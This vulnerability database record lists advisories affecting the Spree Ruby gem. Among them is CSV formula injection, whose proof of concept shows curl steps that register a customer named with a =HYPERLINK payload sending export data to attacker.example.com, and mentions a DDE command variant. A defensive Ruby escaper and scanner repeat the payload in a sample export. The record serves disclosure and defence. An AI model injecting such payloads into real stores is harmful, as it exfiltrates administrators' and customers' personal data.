Lookup for vulnerable packages by Package URL.

Purl pkg:gem/spree@0.50.0
Type gem
Namespace
Name spree
Version 0.50.0
Qualifiers
Subpath
Is_vulnerable true
Next_non_vulnerable_version null
Latest_non_vulnerable_version null
Affected_by_vulnerabilities
0
url VCID-153y-kwk2-xyfd
vulnerability_id VCID-153y-kwk2-xyfd
summary
Spree: CSV Formula Injection in Customer Export
### Summary

CSV formula injection (also known as formula injection or CSV injection) affects the customer export.
User-controlled values (customer names, email addresses, and shipping addresses) are written into
the CSV verbatim. When an administrator opens a crafted export in Microsoft Excel or LibreOffice Calc,
formulas embedded in user data execute in the context of the administrator's desktop, potentially
exfiltrating data or executing OS commands via DDE (Dynamic Data Exchange).

---

### Details

#### Affected presenters and fields

| Presenter | Path | User-controlled fields |
|---|---|---|
| `CustomerPresenter` | `spree/core/app/presenters/spree/csv/customer_presenter.rb:36` | `first_name`, `last_name`, `address1`, `address2`, `city`, `phone` |

#### Vulnerable code — `customer_presenter.rb` (representative example)

```ruby
# spree/core/app/presenters/spree/csv/customer_presenter.rb:36–53
def call
  csv = [
    customer.first_name,          # ← written verbatim; may contain =HYPERLINK(...)
    customer.last_name,           # ← user-controlled
    customer.email,              
    customer.accepts_email_marketing ? Spree.t(:say_yes) : Spree.t(:say_no),
    customer.address&.company,    # ← user-controlled
    customer.address&.address1,   # ← user-controlled
    customer.address&.address2,   # ← user-controlled
    customer.address&.city,       # ← user-controlled
    customer.address&.state_text,
    customer.address&.state_abbr,
    customer.address&.country&.name,
    customer.address&.country&.iso,
    customer.address&.zipcode,
    customer.phone,               # ← user-controlled
    customer.amount_spent_in(Spree::Store.current.default_currency),
    customer.completed_orders.count,
  ]
  csv += metafields_for_csv(customer)
  csv
end
```
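The defensive counterpart to the presenter above, as an added example that is not Spree's code: a cell escaper that neutralises the spreadsheet formula triggers, a hardened row builder over a hypothetical `CustomerRecord` struct standing in for the real customer model, and a scanner that finds formula-leading cells in an already-generated export of the shape shown in the advisory. The sample export is constructed for the example.

```ruby
# Added example, not Spree's code. Neutralises spreadsheet formula triggers
# in CSV cells and scans an export for cells that were not neutralised.
require "csv"

# Leading characters that Excel and LibreOffice Calc treat as the start of a
# formula. Tab and carriage return are included because a payload can hide
# the real trigger behind leading whitespace that the spreadsheet strips.
FORMULA_TRIGGERS = ["=", "+", "-", "@", "\t", "\r"].freeze

# Returns true when a cell would be evaluated as a formula if opened in a
# spreadsheet application.
def formula_cell?(value)
  value.is_a?(String) && !value.empty? && FORMULA_TRIGGERS.include?(value[0])
end

# Prefixes a formula-leading string with a single quote so the spreadsheet
# renders it as literal text. Non-strings, empty strings and safe strings
# are returned unchanged, so numeric columns keep their type.
def escape_csv_formula(value)
  formula_cell?(value) ? "'#{value}" : value
end

# Hypothetical stand-in for the customer model; only the readers the
# presenter uses for user-controlled fields are modelled here.
CustomerRecord = Struct.new(:first_name, :last_name, :email, :phone)

# Hardened counterpart of the presenter's row-building step: every cell goes
# through escape_csv_formula before it reaches the CSV writer.
def customer_csv_row(customer)
  [
    customer.first_name,
    customer.last_name,
    customer.email,
    customer.phone,
  ].map { |cell| escape_csv_formula(cell) }
end

# Scans an already-generated export and returns [row, column, cell] triples
# for every cell that would fire as a formula. Usable as a release gate on
# exports produced by an unpatched version.
def find_formula_cells(csv_text)
  findings = []
  CSV.parse(csv_text).each_with_index do |row, r|
    row.each_with_index do |cell, c|
      findings << [r, c, cell] if formula_cell?(cell)
    end
  end
  findings
end

# Constructed sample export that mirrors the layout shown in the advisory.
SAMPLE_EXPORT = <<~EXPORT
  First Name,Last Name,Email
  "=HYPERLINK(""http://attacker.example.com/exfil?d=""&B1,""Click"")",Smith,attacker@evil.com
  Alice,Jones,alice@example.com
EXPORT

if __FILE__ == $PROGRAM_NAME
  find_formula_cells(SAMPLE_EXPORT).each do |r, c, cell|
    puts "row #{r}, column #{c}: #{cell.inspect}"
  end
  p customer_csv_row(CustomerRecord.new("=1+1", "Smith", "attacker@evil.com", "+15550100"))
end
```

The single-quote prefix is the usual trade-off: phone numbers written as `+1...` and negative numbers stored as strings are also escaped, and the quote is visible to any non-spreadsheet consumer of the file, so apply it only on the export path that ends in a spreadsheet rather than in the model. The scanner is the check to run over exports that were produced before the fix was deployed.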

---

### PoC

**Precondition**: A Spree store with public customer registration enabled (default
configuration). No special permissions required for the attacker.

#### Step 1 — Register as a customer with an injected first name

```bash
curl -X POST https://store.example.com/api/v3/store/customers \
  -H "Content-Type: application/json" \
  -H "X-Spree-Api-Key: pk_<publishable_api_key>" \
  -d '{
    "email": "attacker@evil.com",
    "password": "password123",
    "password_confirmation": "password123",
    "first_name": "=HYPERLINK(\"http://attacker.example.com/exfil?d=\"&B1,\"Click\")",
    "last_name": "Smith"
  }'
```

#### Step 2 — Admin triggers a customer export

```bash
curl -X POST https://store.example.com/api/v3/admin/exports \
  -H "Authorization: Bearer <admin_jwt>" \
  -H "Content-Type: application/json" \
  -d '{"type": "Spree::Exports::Customers", "record_selection": "all"}'
```

#### Step 3 — Admin polls until ready, then downloads

```bash
# Poll for completion
curl https://store.example.com/api/v3/admin/exports/<export_id> \
  -H "Authorization: Bearer <admin_jwt>"

# Download
curl https://store.example.com/api/v3/admin/exports/<export_id>/download \
  -H "Authorization: Bearer <admin_jwt>" \
  -o customers.csv
```

#### Step 4 — Verify injection in the raw CSV (without opening in Excel)

Open `customers.csv` in a text editor. The first data row will contain:

```
"=HYPERLINK(""http://attacker.example.com/exfil?d=""&B1,""Click"")","Smith","attacker@evil.com",...
```

#### Step 5 — Admin opens `customers.csv` in Microsoft Excel (Windows)

- Excel warns about external data connections; if the administrator clicks **Enable**, the
  `HYPERLINK` formula fires and sends a GET request to `http://attacker.example.com/exfil?d=<B1_value>`.
- Cell B1 in the customers export is the **Last Name** column. Adjacent columns contain
  email, address, and order total data for all exported customers.
- With the DDE variant (`=CMD|...`) on older or unpatched Excel versions, a subprocess
  is launched on the administrator's machine.

---

### Impact

**Vulnerability class**: CSV / Formula Injection (CWE-1236)

#### Who is impacted

- **Administrators** who download and open export files in spreadsheet software are the
  direct victims. Administrative accounts have access to all store data, payment method
  configurations, customer PII, and full order history.

#### Realistic attack chain

| Step | Actor | Action | Privilege required |
|---|---|---|---|
| 1 | Attacker | Registers as customer | Public registration |
| 2 | Attacker | Sets `first_name` to formula payload | None beyond registration |
| 3 | Admin | Runs a routine weekly/monthly export | Normal operational task |
| 4 | Admin | Opens CSV in Excel | None |
| 5 | Attacker | Receives exfiltrated spreadsheet data | Passive |

#### Data at risk

All data visible to the administrator in the spreadsheet at the time of opening, including:

- All exported customer emails, names, addresses, phone numbers
- Order totals and purchase history
- Any other columns in the same export file
references
0
reference_url https://github.com/spree/spree
reference_id
reference_type
scores
0
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree
1
reference_url https://github.com/spree/spree/releases/tag/v5.2.8
reference_id
reference_type
scores
0
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/releases/tag/v5.2.8
2
reference_url https://github.com/spree/spree/releases/tag/v5.3.6
reference_id
reference_type
scores
0
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/releases/tag/v5.3.6
3
reference_url https://github.com/spree/spree/releases/tag/v5.4.3
reference_id
reference_type
scores
0
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/releases/tag/v5.4.3
4
reference_url https://github.com/spree/spree/security/advisories/GHSA-xf4v-w5x5-pv79
reference_id
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/security/advisories/GHSA-xf4v-w5x5-pv79
5
reference_url https://github.com/advisories/GHSA-xf4v-w5x5-pv79
reference_id GHSA-xf4v-w5x5-pv79
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xf4v-w5x5-pv79
fixed_packages
0
url pkg:gem/spree@5.2.8
purl pkg:gem/spree@5.2.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.2.8
1
url pkg:gem/spree@5.3.6
purl pkg:gem/spree@5.3.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.3.6
2
url pkg:gem/spree@5.4.3
purl pkg:gem/spree@5.4.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.4.3
aliases GHSA-xf4v-w5x5-pv79
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-153y-kwk2-xyfd
1
url VCID-7jum-4ny7-xuhy
vulnerability_id VCID-7jum-4ny7-xuhy
summary
Remote Command Execution in Spree search functionality
Spree versions prior to 0.60.2 contain a remote command execution
vulnerability in the search functionality. The application fails to
properly sanitize input passed via the `search[:send][]` parameter,
which is dynamically invoked using Ruby’s `send` method. This allows
attackers to execute arbitrary shell commands on the server without
authentication.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2011-10019
reference_id
reference_type
scores
0
value 0.6931
scoring_system epss
scoring_elements 0.98663
published_at 2026-06-08T12:55:00Z
1
value 0.6931
scoring_system epss
scoring_elements 0.98664
published_at 2026-06-07T12:55:00Z
2
value 0.79644
scoring_system epss
scoring_elements 0.99115
published_at 2026-06-09T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2011-10019
1
reference_url https://github.com/advisories/GHSA-97vm-c39p-jr86
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-97vm-c39p-jr86
2
reference_url https://github.com/orgs/spree
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 10
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value 10.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/
url https://github.com/orgs/spree
3
reference_url https://github.com/spree/spree
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree
4
reference_url https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_search_exec.rb
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 10
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value 10.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/
url https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_search_exec.rb
5
reference_url https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group
6
reference_url https://www.exploit-db.com/exploits/17941
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 10
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value 10.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/
url https://www.exploit-db.com/exploits/17941
7
reference_url https://www.vulncheck.com/advisories/spreecommerce-search-parameter-rce
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 10
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value 10.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/
url https://www.vulncheck.com/advisories/spreecommerce-search-parameter-rce
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2011-10019
reference_id CVE-2011-10019
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements
1
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value 10.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
3
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2011-10019
9
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2011-10019.yml
reference_id CVE-2011-10019.YML
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2011-10019.yml
10
reference_url https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/
reference_id remote-command-product-group
reference_type
scores
0
value 10
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/
url https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/
fixed_packages
0
url pkg:gem/spree@0.60.2
purl pkg:gem/spree@0.60.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
2
vulnerability VCID-s4mu-v75h-dfep
3
vulnerability VCID-t9gu-2vs3-g7cu
4
vulnerability VCID-y37s-b27m-n7ad
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@0.60.2
1
url pkg:gem/spree@0.70.0.rc2
purl pkg:gem/spree@0.70.0.rc2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
2
vulnerability VCID-s4mu-v75h-dfep
3
vulnerability VCID-t9gu-2vs3-g7cu
4
vulnerability VCID-y37s-b27m-n7ad
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@0.70.0.rc2
aliases CVE-2011-10019, GHSA-97vm-c39p-jr86, OSV-76011
risk_score 10.0
exploitability 2.0
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7jum-4ny7-xuhy
2
url VCID-cwh1-mmky-ukcx
vulnerability_id VCID-cwh1-mmky-ukcx
summary
Ensure that doorkeeper_token is valid when authenticating requests in API v2 calls
### Impact

The perpetrator who previously obtained an old expired user
token could use it to access Storefront API v2 endpoints.

### Patches

Please upgrade to 3.7.11, 4.0.4, or 4.1.11, depending on the Spree version you use.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-15269
reference_id
reference_type
scores
0
value 0.00257
scoring_system epss
scoring_elements 0.49283
published_at 2026-06-04T12:55:00Z
1
value 0.00257
scoring_system epss
scoring_elements 0.49319
published_at 2026-06-09T12:55:00Z
2
value 0.00257
scoring_system epss
scoring_elements 0.49307
published_at 2026-06-08T12:55:00Z
3
value 0.00257
scoring_system epss
scoring_elements 0.49337
published_at 2026-06-07T12:55:00Z
4
value 0.00257
scoring_system epss
scoring_elements 0.49354
published_at 2026-06-06T12:55:00Z
5
value 0.00257
scoring_system epss
scoring_elements 0.49344
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-15269
1
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2020-15269.yml
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2020-15269.yml
2
reference_url https://github.com/spree/spree
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree
3
reference_url https://github.com/spree/spree/commit/e43643abfe51f54bd9208dd02298b366e9b9a847
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/commit/e43643abfe51f54bd9208dd02298b366e9b9a847
4
reference_url https://github.com/spree/spree/security/advisories/GHSA-f8cm-364f-q9qh
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3
scoring_elements
1
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
2
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
3
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/security/advisories/GHSA-f8cm-364f-q9qh
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-15269
reference_id CVE-2020-15269
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-15269
6
reference_url https://github.com/advisories/GHSA-f8cm-364f-q9qh
reference_id GHSA-f8cm-364f-q9qh
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-f8cm-364f-q9qh
fixed_packages
0
url pkg:gem/spree@3.7.11
purl pkg:gem/spree@3.7.11
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-yqz2-9hru-wkcs
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@3.7.11
1
url pkg:gem/spree@4.0.4
purl pkg:gem/spree@4.0.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-yqz2-9hru-wkcs
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@4.0.4
2
url pkg:gem/spree@4.1.11
purl pkg:gem/spree@4.1.11
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-yqz2-9hru-wkcs
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@4.1.11
aliases CVE-2020-15269, GHSA-f8cm-364f-q9qh
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-cwh1-mmky-ukcx
3
url VCID-s4mu-v75h-dfep
vulnerability_id VCID-s4mu-v75h-dfep
summary
Private information access through CSRF
A vulnerability in the API can allow an attacker to commit CSRF gaining access to private information.
references
0
reference_url http://osvdb.org/show/osvdb/119205
reference_id
reference_type
scores
url http://osvdb.org/show/osvdb/119205
1
reference_url https://spreecommerce.com/blog/security-updates-2015-3-3
reference_id
reference_type
scores
url https://spreecommerce.com/blog/security-updates-2015-3-3
fixed_packages
0
url pkg:gem/spree@2.2.10
purl pkg:gem/spree@2.2.10
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.2.10
1
url pkg:gem/spree@2.3.8
purl pkg:gem/spree@2.3.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.3.8
2
url pkg:gem/spree@2.4.5
purl pkg:gem/spree@2.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.4.5
3
url pkg:gem/spree@3.0.0.rc4
purl pkg:gem/spree@3.0.0.rc4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@3.0.0.rc4
aliases OSVDB-119205
risk_score null
exploitability 0.5
weighted_severity 0.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-s4mu-v75h-dfep
4
url VCID-t9gu-2vs3-g7cu
vulnerability_id VCID-t9gu-2vs3-g7cu
summary
Permissions, Privileges, and Access Controls
app/models/spree/user.rb in spree_auth_devise in Spree does not perform mass assignment safely when updating a user, which allows remote authenticated users to assign arbitrary roles to themselves.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2013-2506
reference_id
reference_type
scores
0
value 0.00171
scoring_system epss
scoring_elements 0.38121
published_at 2026-06-07T12:55:00Z
1
value 0.00171
scoring_system epss
scoring_elements 0.38098
published_at 2026-06-09T12:55:00Z
2
value 0.00171
scoring_system epss
scoring_elements 0.38087
published_at 2026-06-08T12:55:00Z
3
value 0.00171
scoring_system epss
scoring_elements 0.38055
published_at 2026-06-04T12:55:00Z
4
value 0.00171
scoring_system epss
scoring_elements 0.38145
published_at 2026-06-05T12:55:00Z
5
value 0.00171
scoring_system epss
scoring_elements 0.38149
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2013-2506
1
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth/CVE-2013-2506.yml
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth/CVE-2013-2506.yml
2
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth_devise/CVE-2013-2506.yml
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth_devise/CVE-2013-2506.yml
3
reference_url https://github.com/spree/spree_auth_devise
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree_auth_devise
4
reference_url https://github.com/spree/spree_auth_devise/commit/038d74771d3b5c13d13b738b73dfda1033a99f65
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree_auth_devise/commit/038d74771d3b5c13d13b738b73dfda1033a99f65
5
reference_url https://github.com/spree/spree_auth_devise/commit/fda3ab9fb536c64fe18a9b78bb21c6176b3ea24d
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree_auth_devise/commit/fda3ab9fb536c64fe18a9b78bb21c6176b3ea24d
6
reference_url http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
reference_id
reference_type
scores
url http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
7
reference_url https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
reference_id
reference_type
scores
url https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
8
reference_url https://web.archive.org/web/20131207040639/https://rubygems.org/gems/spree_auth_devise/versions
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20131207040639/https://rubygems.org/gems/spree_auth_devise/versions
9
reference_url https://web.archive.org/web/20160331131233/https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20160331131233/https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2013-2506
reference_id CVE-2013-2506
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2013-2506
11
reference_url https://github.com/advisories/GHSA-jp57-9j37-5476
reference_id GHSA-jp57-9j37-5476
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jp57-9j37-5476
fixed_packages
0
url pkg:gem/spree@1.2.0.rc1
purl pkg:gem/spree@1.2.0.rc1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
2
vulnerability VCID-s4mu-v75h-dfep
3
vulnerability VCID-t9gu-2vs3-g7cu
4
vulnerability VCID-y37s-b27m-n7ad
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@1.2.0.rc1
1
url pkg:gem/spree@1.2.0
purl pkg:gem/spree@1.2.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
2
vulnerability VCID-s4mu-v75h-dfep
3
vulnerability VCID-t9gu-2vs3-g7cu
4
vulnerability VCID-y37s-b27m-n7ad
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@1.2.0
2
url pkg:gem/spree@1.3.0
purl pkg:gem/spree@1.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
2
vulnerability VCID-s4mu-v75h-dfep
3
vulnerability VCID-t9gu-2vs3-g7cu
4
vulnerability VCID-y37s-b27m-n7ad
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@1.3.0
3
url pkg:gem/spree@3.0.5
purl pkg:gem/spree@3.0.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@3.0.5
aliases CVE-2013-2506, GHSA-jp57-9j37-5476, OSV-90865
risk_score 3.1
exploitability 0.5
